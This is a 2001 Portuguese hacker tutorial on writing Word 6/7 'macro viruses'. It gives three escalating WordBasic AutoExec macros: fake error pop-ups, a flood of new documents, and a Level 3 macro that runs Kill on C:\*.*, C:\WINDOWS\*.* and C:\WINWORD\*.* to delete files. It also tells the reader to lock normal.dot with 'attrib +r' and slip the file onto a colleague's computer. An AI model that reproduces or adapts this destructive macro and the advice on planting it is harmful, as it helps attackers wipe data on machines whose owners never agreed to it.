VIRUS DE MACRO

 

Ainda hoje existe muita gente que so é capaz de abrir o word, editar, negrita, sublinhar e mandar para impressora, muitos, milhares so sabem mexer no basico mesmo. Eles nem imaginam o que tem por traz deste riquissimo processador de texto. 

Esta matéria tem como objetivo fazer desde pequenas ate grandes sacanagens com usuários pentelhos. 

ps: Software/versão Abrangido: Word da Microsoft, versões 6 (win3.11) e 7.0 (win95) 

O Word possui um arquivo chamado "normal.dot" onde estão todas as configurações padrão do word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado. 

Niveis de sacanagem
Nivel 1..... Apenas uma brincadeira
Nivel 2..... Apenas uma brincadeira de mau gosto
Nivel 3..... não é mais brincadeira. 

Primeiro voce precisa criar uma macro... siga os passos:
Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em  Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatorio) esta macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver la (Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo. 

ps: existe outras formas/meios d criar uma macro,mas esta é mais simples. 

Nivel 1 

O nivel 1 serve para você se mostrar, falando que entende do Word melhor do que ninguém. Cada vez que o usuário inicia o Word recebera uma mensagem... de alerta ou qualquer outro coisa que sair da sua mente. veja abaixo.  

Sub MAIN
MsgBox "Você é um lammer! Eu não irei prosseguir com o sistema"
MsgBox "Usuário Ghost Detectado FATAL ERROR"
MsgBox "O_Ghost-CE visite http://www.callavera.cjb.net"
End Sub 

Nivel 2 

É para deixar o usuário irritadíssimo.
no corpo da macro cole este texto abaixo: 

Sub MAIN
ArquivoNovoPadrão
Inserir "Calavera "
ArquivoNovoPadrão
Inserir "Hacker"
ArquivoNovoPadrão
Inserir "Page"
ArquivoNovoPadrão
Inserir "Calavera Hacker Page "
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "Calavera Hacker Page"
End Sub 

Nivel 3 

Bom este nível é pura sacanagem,com ele um simples clicar* do mouse, e tudo
desaparece! isto mesmo "del *.*" ou apenas os documentos, você é quem sabe. 

Sub MAIN
Kill "C:\*.*"
Kill "C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub 

Lembre-se de que estes macros, sao gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicializacao,entao se você for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'. 

Detalhes:

-Existe uma forma de iniciar o Word, sem que inicialize a macro 'AutoExec' mas não irei falar, descubra você mesmo.

-A macro do word é uma ferramenta riquíssima, procure fuçar. Você pode fazer estas no seu próprio computador(so cuide!), salvando sempre no arq. "normal.dot" depois copie apenas este arquivo para aquele seu colega/amigo pentelho e saia de perto, para não explodir em você.

 

Copyright2001By <Mundo-HackerBr>

Hosted by www.Geocities.ws

1